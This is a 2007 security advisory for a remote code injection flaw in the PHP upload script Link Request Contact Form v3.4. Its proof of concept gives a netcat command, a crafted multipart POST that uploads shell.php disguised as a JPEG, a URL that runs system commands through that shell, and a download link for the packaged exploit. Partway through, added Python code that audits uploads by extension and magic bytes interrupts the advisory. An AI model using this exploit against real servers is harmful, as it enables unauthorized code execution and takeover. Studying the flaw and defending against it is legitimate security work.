Link Request Contact Form v3.4 Remote Code Injection
-=[--------------------ADVISORY-------------------]=-

Link Request Contact Form v3.4

Author: CorryL [corryl80@gmail.com]
-=[-----------------------------------------------]=-


-=[+] Application: Link Request Contact Form
-=[+] Version: 3.4
-=[+] Vendor's URL: http://www.americanfinancing.net/link-request-contact-form.cfm
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Remote code injection
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: http://corryl.altervista.org/
-=[+] Irc Chan: irc.darksin.net #x0n3-h4ck

..::[ Description ]::..


Link Request Contact Form v3.4 is designed to let your friends or clients request to add their website link(s)
banner(s) to your website.
Users can upload their banner(s), as a JPG or GIF file, to a directory for your review before you post their listing(s).
Once the user fills in all the details, an email will be sent to you with the file location and the user's details.
The script will also send your client a confirmation email providing them with the same details.
You can modify the script to your liking and easily change the location where the files will be stored.
There are no restrictions and easy installation instructions are provided.


..::[ Bug ]::..

This software is affected by a remote code injection bug:
a remote attacker is able to inject code onto the victim server,
where it is subsequently executed.
This happens because the script allows a JPG or BMP image to be uploaded
but does not check the data, which allows PHP code to be injected.



..::[ Proof Of Concept ]::..

Cut out exploit.txt, edit the server-victim information,
and use netcat to send the exploit to the server.

nc server-victim 80 < exploit.txt

Open the browser and connect to http://server-victim/uploads/shell.php?cmd=uname -a

<---------cut here exploit.txt--------->
POST http://server-victim:80/output.php HTTP/1.1
Host: www.server-victim.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; it; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/prova/link-request-contact-form.html
Cookie: PHPSESSID=0654c063218badc1ad8b5a04edf9198d
Content-Type: multipart/form-data; boundary=---------------------------190291279311134
Content-length: 1115

-----------------------------190291279311134
Content-Disposition: form-data; name="Full_Name"

aaa
-----------------------------190291279311134
Content-Disposition: form-data; name="email"

aa@aa.aa
-----------------------------190291279311134
Content-Disposition: form-data; name="Link_Back"

http://127.0.0.1/
-----------------------------190291279311134
Content-Disposition: form-data; name="Site_Title"

aa
-----------------------------190291279311134
Content-Disposition: form-data; name="You_Web_Address"

http://127.0.0.1/
-----------------------------190291279311134
Content-Disposition: form-data; name="Site_Description"

aaa
-----------------------------190291279311134
Content-Disposition: form-data; name="upload"; filename="shell.php"
Content-Type: image/jpeg


-----------------------------190291279311134
Content-Disposition: form-data; name="Submit"

Submit
-----------------------------190291279311134--



<----------------end cut---------------->
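
The request above labels a file named `shell.php` as `image/jpeg`, and both values are chosen by the client. As an added example (not part of the original advisory or the vendor's code), the Python below parses a multipart body of that shape and reports file parts whose extension or leading bytes are not JPEG/GIF; the helper names, allow-list, boundary and sample bodies are constructed for illustration.

```python
import os
import re

# Formats the form claims to accept, keyed by their leading magic bytes.
MAGIC = {b"\xff\xd8\xff": "jpg", b"GIF87a": "gif", b"GIF89a": "gif"}
ALLOWED_EXT = {"jpg", "jpeg", "gif"}
BOUNDARY = "constructed-boundary-1"  # constructed value, not the advisory's

def sample(filename: str, data: bytes) -> bytes:
    """Constructed request body: one text field plus the 'upload' file field."""
    b = b"--" + BOUNDARY.encode()
    return b"\r\n".join([
        b, b'Content-Disposition: form-data; name="Full_Name"', b"", b"aaa",
        b, b'Content-Disposition: form-data; name="upload"; filename="'
           + filename.encode() + b'"',
        b"Content-Type: image/jpeg", b"", data,   # declared type is client-controlled
        b + b"--", b""])

def file_parts(body: bytes, boundary: str):
    """Yield (filename, declared_type, data) for each file part of a multipart body."""
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):               # closing delimiter
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        m = re.search(rb'filename="([^"]*)"', head)
        if m:
            t = re.search(rb"(?im)^content-type:\s*([^\r\n;]+)", head)
            yield (m.group(1).decode("latin-1"),
                   t.group(1).decode("latin-1").strip() if t else "",
                   data[:-2] if data.endswith(b"\r\n") else data)

def audit(body: bytes, boundary: str) -> list:
    """Return one finding per failed check; the declared type is never trusted."""
    findings = []
    for name, declared, data in file_parts(body, boundary):
        ext = os.path.splitext(name)[1].lstrip(".").lower()
        sniffed = next((k for m, k in MAGIC.items() if data.startswith(m)), None)
        if ext not in ALLOWED_EXT:
            findings.append(f"{name}: extension '{ext}' not allowed (declared {declared})")
        if sniffed is None:
            findings.append(f"{name}: content is not JPEG/GIF (declared {declared})")
    return findings
```

Passing both checks does not make a file safe to execute: the server should still choose the stored file name itself and serve the upload directory with script execution disabled.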


download the netcat+exploit from my server:

http://corryl.altervista.org/index.php?mod=Download/Exploit#exploit-LRCF-v3.4.rar





Posted Sunday 10 June 2007 - 12:01 (read 2091 times)
